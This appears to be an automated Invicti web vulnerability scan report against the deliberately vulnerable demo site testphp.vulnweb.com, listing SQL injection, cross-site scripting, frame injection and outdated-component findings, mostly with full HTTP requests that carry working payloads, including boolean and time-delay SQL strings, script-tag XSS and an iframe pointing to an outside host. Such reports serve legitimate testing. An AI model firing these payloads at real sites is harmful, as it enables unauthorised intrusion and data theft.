| CONFIRM | VULNERABILITY | METHOD | URL | PARAMETER | PARAMETER TYPES |
|---|---|---|---|---|---|
| Vulnerability is unconfirmedVulnerability is unconfirmedCritical severityCritical severity | [Probable] SQL Injection | POST | http://testphp.vulnweb.com/cart.php | addcart | Post |
| Vulnerability is unconfirmedVulnerability is unconfirmedCritical severityCritical severity | [Probable] SQL Injection | GET | http://testphp.vulnweb.com/search.php?test=%27%2b%20(select%20convert(int%2c%20cast(0x5f21403264696c656d6d61%20as%20varchar(8000)))%20from%20syscolumns)%20%2b%27 | test | Querystring |
| Vulnerability is unconfirmedVulnerability is unconfirmedCritical severityCritical severity | [Probable] SQL Injection | POST | http://testphp.vulnweb.com/search.php?test=%27%2b%20(select%20convert(int%2c%20cast(0x5f21403264696c656d6d61%20as%20varchar(8000)))%20from%20syscolumns)%20%2b%27 | test | Querystring |
| Vulnerability is unconfirmedVulnerability is unconfirmedCritical severityCritical severity | Out-of-date Version (PHP) | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is confirmedVulnerability is confirmedCritical severityCritical severity | Boolean Based SQL Injection | GET | http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10 | artist | Querystring |
| Vulnerability is confirmedVulnerability is confirmedCritical severityCritical severity | Boolean Based SQL Injection | GET | http://testphp.vulnweb.com/listproducts.php?artist=2%20OR%2017-7%3d10 | artist | Querystring |
| Vulnerability is confirmedVulnerability is confirmedCritical severityCritical severity | Boolean Based SQL Injection | GET | http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10 | cat | Querystring |
| Vulnerability is confirmedVulnerability is confirmedCritical severityCritical severity | Boolean Based SQL Injection | GET | http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10 | pic | Querystring |
| Vulnerability is confirmedVulnerability is confirmedCritical severityCritical severity | Boolean Based SQL Injection | POST | http://testphp.vulnweb.com/secured/newuser.php | uuname | Post |
| Vulnerability is confirmedVulnerability is confirmedCritical severityCritical severity | Boolean Based SQL Injection | POST | http://testphp.vulnweb.com/userinfo.php | pass | Post |
| Vulnerability is confirmedVulnerability is confirmedCritical severityCritical severity | Boolean Based SQL Injection | POST | http://testphp.vulnweb.com/userinfo.php | uname | Post |
| Vulnerability is unconfirmedVulnerability is unconfirmedHigh severityHigh severity | [Probable] Local File Inclusion | GET | http://testphp.vulnweb.com/showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1&size=160 | file | Querystring |
| Vulnerability is unconfirmedVulnerability is unconfirmedHigh severityHigh severity | Out-of-date Version (Nginx) | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/comment.php | name | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/guestbook.php | text | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/guestbook.php | name | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | GET | http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x003049)%20x%3d%22 | pp | Querystring |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x004FDC)%3c%2fscRipt%3e&pp=12 | p | Querystring |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x004FDE)%3c%2fscRipt%3e | pp | Querystring |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | GET | http://testphp.vulnweb.com/listproducts.php?artist=%3cscRipt%3enetsparker(0x00437A)%3c%2fscRipt%3e | artist | Querystring |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | GET | http://testphp.vulnweb.com/listproducts.php?cat=%3cscRipt%3enetsparker(0x001FDA)%3c%2fscRipt%3e | cat | Querystring |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/search.php?test=query | searchFor | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | uuname | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | urname | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | uemail | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | ucc | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | uphone | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Cross-site Scripting | POST | http://testphp.vulnweb.com/secured/newuser.php | uaddress | Post |
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Out-of-date Component (class.upload.php) | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Out-of-date Component (phpmailer) | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Out-of-date Component (phpunit) | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Out-of-date Component (smarty) | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is confirmedVulnerability is confirmedHigh severityHigh severity | Password Transmitted over HTTP | GET | http://testphp.vulnweb.com/login.php | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedMedium severityMedium severity | [Possible] Cross-site Scripting | GET | http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x002932)%3C/scRipt%3E&size=160 | file | Querystring |
| Vulnerability is unconfirmedVulnerability is unconfirmedMedium severityMedium severity | Frame Injection | GET | http://testphp.vulnweb.com/showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&size=160 | file | Querystring |
| Vulnerability is unconfirmedVulnerability is unconfirmedMedium severityMedium severity | JetBrains .idea Project Directory Detected | GET | http://testphp.vulnweb.com/.idea/workspace.xml | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedMedium severityMedium severity | PHP session.use_only_cookies Is Disabled | GET | http://testphp.vulnweb.com/secured/phpinfo.php | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedMedium severityMedium severity | SSL/TLS Not Implemented | GET | https://testphp.vulnweb.com/ | ||
| Vulnerability is confirmedVulnerability is confirmedMedium severityMedium severity | Frame Injection | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&pp=12 | p | Querystring |
| Vulnerability is confirmedVulnerability is confirmedMedium severityMedium severity | Frame Injection | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e | pp | Querystring |
| Vulnerability is confirmedVulnerability is confirmedMedium severityMedium severity | Frame Injection | GET | http://testphp.vulnweb.com/listproducts.php?artist=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e | artist | Querystring |
| Vulnerability is confirmedVulnerability is confirmedMedium severityMedium severity | Frame Injection | GET | http://testphp.vulnweb.com/listproducts.php?cat=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e | cat | Querystring |
| Vulnerability is confirmedVulnerability is confirmedMedium severityMedium severity | Open Policy Crossdomain.xml Detected | GET | http://testphp.vulnweb.com/crossdomain.xml | ||
| Vulnerability is confirmedVulnerability is confirmedMedium severityMedium severity | Out-of-date Component (tinymce) | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | [Possible] Cross-site Request Forgery | GET | http://testphp.vulnweb.com/guestbook.php | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | [Possible] Cross-site Request Forgery in Login Form | GET | http://testphp.vulnweb.com/login.php | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | [Possible] Insecure Reflected Content | GET | http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=N3tSp4rK3R&pp=12 | p | Querystring |
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | [Possible] Internal IP Address Disclosure | GET | http://testphp.vulnweb.com/secured/phpinfo.php | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | [Possible] Phishing by Navigating Browser Tabs | GET | http://testphp.vulnweb.com/disclaimer.php | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | Database Error Message Disclosure | GET | http://testphp.vulnweb.com/search.php?test=%27%20WAITFOR%20DELAY%20%270%3a0%3a25%27--%20%2f*%204ba992a8-9bcd-4b9a-bbee-8b7a829e2e38%20*%2f | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | Missing X-Content-Type-Options Header | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | phpinfo() Output Detected | GET | http://testphp.vulnweb.com/secured/phpinfo.php | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | Version Disclosure (Nginx) | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedLow severityLow severity | Version Disclosure (PHP) | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is confirmedVulnerability is confirmedLow severityLow severity | Cookie Not Marked as HttpOnly | GET | http://testphp.vulnweb.com/AJAX/ | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedBestPractice severityBestPractice severity | Referrer-Policy Not Implemented | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedBestPractice severityBestPractice severity | SameSite Cookie Not Implemented | GET | http://testphp.vulnweb.com/AJAX/ | ||
| Vulnerability is confirmedVulnerability is confirmedBestPractice severityBestPractice severity | Content Security Policy (CSP) Not Implemented | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedInformation severityInformation severity | .htaccess File Detected | GET | http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedInformation severityInformation severity | [Possible] Login Page Identified | GET | http://testphp.vulnweb.com/login.php | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedInformation severityInformation severity | [Possible] SQL File Detected | GET | http://testphp.vulnweb.com/admin/create.sql | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedInformation severityInformation severity | Email Address Disclosure | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedInformation severityInformation severity | Nginx Web Server Identified | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedInformation severityInformation severity | PHP Identified | GET | http://testphp.vulnweb.com/ | ||
| Vulnerability is unconfirmedVulnerability is unconfirmedInformation severityInformation severity | Unexpected Redirect Response Body (Too Large) | GET | http://testphp.vulnweb.com/comment.php | ||
| Vulnerability is confirmedVulnerability is confirmedInformation severityInformation severity | Autocomplete Enabled (Password Field) | GET | http://testphp.vulnweb.com/login.php | ||
| Vulnerability is confirmedVulnerability is confirmedInformation severityInformation severity | Database Detected (MySQL) | GET | http://testphp.vulnweb.com/listproducts.php?cat=-1%20OR%201%3d1%20AND%20IFNULL(ASCII(SUBSTRING((SELECT%200x4E4554535041524B4552)%2c9%2c1))%2c0)%3d82--%20 | ||
| Vulnerability is confirmedVulnerability is confirmedInformation severityInformation severity | Forbidden Resource | POST | http://testphp.vulnweb.com/images/ |
Invicti Standard identified a Probable SQL Injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Even though Invicti Standard believes there is a SQL injection in here, it could not confirmit. There can be numerous reasons for Invicti Standard not being able to confirm this. We strongly recommend investigating the issue manually to ensure it is an SQL injection and that it needs to be addressed. You can also consider sending the details of this issue to us so we can address this issue for the next time and give you a more precise result.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | price | Post | 500 |
| POST | addcart | Post | %27 |
POST /cart.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/product.php?pic=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
price=500&addcart=%2527
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | test | Querystring | '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' |
GET /search.php?test=%27%2b%20(select%20convert(int%2c%20cast(0x5f21403264696c656d6d61%20as%20varchar(8000)))%20from%20syscolumns)%20%2b%27 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | searchFor | Post | |
| POST | goButton | Post | go |
| POST | test | Querystring | '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' |
POST /search.php?test=%27%2b%20(select%20convert(int%2c%20cast(0x5f21403264696c656d6d61%20as%20varchar(8000)))%20from%20syscolumns)%20%2b%27 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
searchFor=&goButton=go
| PCI DSS v3.2 | 6.5.1 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A1 |
| OWASP 2017 | A1 |
| CWE | 89 |
| CAPEC | 66 |
| WASC | 19 |
| HIPAA | 164.306(a) , 164.308(a) |
| ASVS 4.0 | 5.3.4 |
| NIST SP 800-53 | SI-10 |
| DISA STIG | V-16807 |
| OWASP API Top Ten 2019 | API8 |
| ISO27001 | A.14.2.5 |
| ISO27001 2022 | A.8.26 |
| ISO27001 2022 | A.8.27 |
| ISO27001 2022 | A.8.28 |
| OWASP Top Ten 2021 | A03 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 10 (Critical) |
| Temporal | 10 (Critical) |
| Environmental | 10 (Critical) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
CVSS 3.1 SCORE | |
|---|---|
| Base | 10 (Critical) |
| Temporal | 10 (Critical) |
| Environmental | 10 (Critical) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
CVSS 4.0 Score | |
|---|---|
| 9.3 / Critical | |
| Exploitability | High |
| Complexity | High |
| Vulnerable system | High |
| Subsequent system | Low |
| Exploitation | High |
| Security requirements | High |
CVSS Vector String |
|---|
| CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
Invicti Standard identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Invicti Standard confirmedthe vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Invicti Standard to identify and confirm the SQL injection.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | artist | Querystring | 1 OR 17-7=10 |
GET /artists.php?artist=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/artists.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | artist | Querystring | 2 OR 17-7=10 |
GET /listproducts.php?artist=2%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | cat | Querystring | 1 OR 17-7=10 |
GET /listproducts.php?cat=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | pic | Querystring | 1 OR 17-7=10 |
GET /product.php?pic=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | uaddress | Post | 3 |
| POST | signup | Post | signup |
| POST | uphone | Post | 3 |
| POST | urname | Post | Smith |
| POST | ucc | Post | 4916613944329494 |
| POST | uemail | Post | netsparker@example.com |
| POST | upass | Post | N3tsp@rker- |
| POST | upass2 | Post | N3tsp@rker- |
| POST | uuname | Post | -1' OR 1=1 OR 'ns'='ns |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress=3&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns&upass=N3tsp%40rker-&uphone=3&urname=Smith&signup=signup
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | pass | Post | -1' OR 1=1 OR 'ns'='ns |
| POST | uname | Post | Smith |
POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
pass=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns&uname=Smith
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | pass | Post | N3tsp@rker- |
| POST | uname | Post | -1' OR 1=1 OR 'ns'='ns |
POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
pass=N3tsp%40rker-&uname=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
| PCI DSS v3.2 | 6.5.1 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A1 |
| OWASP 2017 | A1 |
| CWE | 89 |
| CAPEC | 66 |
| WASC | 19 |
| HIPAA | 164.306(a) , 164.308(a) |
| ASVS 4.0 | 5.3.4 |
| NIST SP 800-53 | SI-10 |
| DISA STIG | V-16807 |
| OWASP API Top Ten 2019 | API8 |
| ISO27001 | A.14.2.5 |
| ISO27001 2022 | A.8.26 |
| ISO27001 2022 | A.8.27 |
| ISO27001 2022 | A.8.28 |
| OWASP Top Ten 2021 | A03 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 10 (Critical) |
| Temporal | 10 (Critical) |
| Environmental | 10 (Critical) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
CVSS 3.1 SCORE | |
|---|---|
| Base | 10 (Critical) |
| Temporal | 10 (Critical) |
| Environmental | 10 (Critical) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
CVSS 4.0 Score | |
|---|---|
| 9.3 / Critical | |
| Exploitability | High |
| Complexity | High |
| Vulnerable system | High |
| Subsequent system | Low |
| Exploitation | High |
| Security requirements | High |
CVSS Vector String |
|---|
| CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
Invicti Standard identified you are using an out-of-date version of PHP.
Double free vulnerability in the format printer in PHP 7.x before 7.0.1 allows remote attackers to have an unspecified impact by triggering an error.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Multiple integer overflows in php_zip.c in the zip extension in PHP before 7.0.6 allow remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted call to (1) getFromIndex or (2) getFromName in the ZipArchive class.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Integer overflow in the xml_utf8_encode function in ext/xml/xml.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long argument to the utf8_encode function, leading to a heap-based buffer overflow.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Integer overflow in the php_filter_encode_url function in ext/filter/sanitizing_filters.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long string, leading to a heap-based buffer overflow.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Integer overflow in the str_pad function in ext/standard/string.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long string, leading to a heap-based buffer overflow.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_TIFF.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The zend_string_extend function in Zend/zend_string.h in PHP through 7.1.5 does not prevent changes to string objects that result in a negative length, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact by leveraging a script's use of .= with a long string.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
In PHP versions prior to 7.4.33, 8.0.25 and 8.2.12, when using imageloadfont() function in gd extension, it is possible to supply a specially crafted font file, such as if the loaded font is used with imagechar() function, the read outside allocated buffer will be used. This can lead to crashes or disclosure of confidential information.
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv('HTTP_PROXY') call or (2) a CGI configuration of PHP, aka an "httpoxy" issue.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
An issue was discovered in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. Due to the way rename() across filesystems is implemented, it is possible that file being renamed is briefly available with wrong permissions while the rename is ongoing, thus enabling unauthorized users to access the data.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the maker_note->offset relationship to value_len.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the data_len variable.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ext/standard/var.c in PHP 5.x through 7.1.24 on Windows allows attackers to cause a denial of service (NULL pointer dereference and application crash) because com and com_safearray_proxy return NULL in com_properties_get in ext/com_dotnet/com_handlers.c, as demonstrated by a serialize call on COM("WScript.Shell").
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
ext/standard/var_unserializer.c in PHP 5.x through 7.1.24 allows attackers to cause a denial of service (application crash) via an unserialize call for the com, dotnet, or variant class.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead of the port number in the second argument of the function.
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N
** DISPUTED ** The GNU Multiple Precision Arithmetic Library (GMP) interfaces for PHP through 7.1.4 allow attackers to cause a denial of service (memory consumption and application crash) via operations on long strings. NOTE: the vendor disputes this, stating "There is no security issue here, because GMP safely aborts in case of an OOM condition. The only attack vector here is denial of service. However, if you allow attacker-controlled, unbounded allocations you have a DoS vector regardless of GMP's OOM behavior."
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the phar uncompressor code would recursively uncompress "quines" gzip files, resulting in an infinite loop.
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
